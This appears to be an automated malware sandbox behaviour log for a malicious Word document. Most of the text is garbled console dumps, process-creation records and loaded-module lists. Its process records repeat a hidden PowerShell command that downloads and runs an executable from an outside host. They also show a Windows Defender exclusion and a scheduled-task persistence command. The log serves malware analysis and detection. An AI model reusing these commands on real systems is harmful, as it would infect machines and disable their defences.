Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._.................Xk....@&d.............................}.dw....X.......0.A.............................................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w...._...............M.Xk....................................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k.................Xk....@&d.............................}.dw............0.A.....................f.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....k...............M.Xk....................................}.dw............0.A..............#d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E.......w....... .........Xk....@&d.............................}.dw............0.A.............."d.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....w...............M.Xk....H...............................}.dw............0.A..............#d.............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............................+v......................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.............................Uv......................0.......#.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P..............................v......................0......./.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P..............................v......................0......./.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.....................l........v......................0.......;...............|.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.....................l........v......................0.......;.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G.......h.......".......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G...............(.P.....................l.......0w......................0.......G.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.....................l.......[w......................0.......S.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.....................l........w......................0.......S.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_.......u.y...e.x.e.....................l........w......................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_...............(.P.....................x........w......................0......._.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.....................x........x......................0.......k.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.....................x....... x......................0.......k.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......h.......2.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w...............(.P.....................l.......tx......................0.......w.......h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................l........x......................0.......................l.......................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................l........x......................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....................l........x......................0...............h...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....................l........y......................0...............h...............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................l.).........E.R.R.O.R.:. ...h.......P...............gs................................................................).....
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ....................l.).........E.R.R.O.(.P.....h.......P...............ms..............................................j.......H.........).....
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.....l...............................................0.......#.......................................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................#...............(.P.....l...............x...............................0.......#.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.....l...............x...............................0......./......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ......................../...............(.P.....l...............x...............................0......./.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.....l...............x.......4.......................0.......;...............|......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................;...............(.P.....l.......................Q.......................0.......;.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......y.......................0.......G.......H......."......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................G...............(.P.....l...............................................0.......G.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.....l...............x...............................0.......S......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................S...............(.P.....l...............x...............................0.......S.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_.......u.y...e.x.e.....l...............x...............................0......._.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................_...............(.P.....l...............x...............................0......._.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.....l.......................F.......................0.......k......................... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................k...............(.P.....l.......................a.......................0.......k.......H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w.......H.......2......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................w...............(.P.....l...............................................0.......w.......H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....l...............................................0.......................l......... .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....l...............................................0...............H...............................
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ................................ .......(.P.....l...............x...............................0...............H................. .............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................(.P.....l...............x.......0.......................0...............H................. .............
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.R.:. ...P...............|................................................. .............................
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ................................E.R.R.O.(.P.....P...............|.......................................................j.......X...............
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe') Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\notepad.exe C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpFA37.tmp
Source: C:\Users\user\AppData\Roaming\explorer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR52EF.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Roaming\explorer.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Users\user\AppData\Roaming\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: explorer[1].exe.0.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: explorer.exe.4.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: eDdYRRbouy.exe.8.dr, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.explorer.exe.1330000.0.unpack, GUI/DangNhap.cs .Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Suspicious powershell command line found
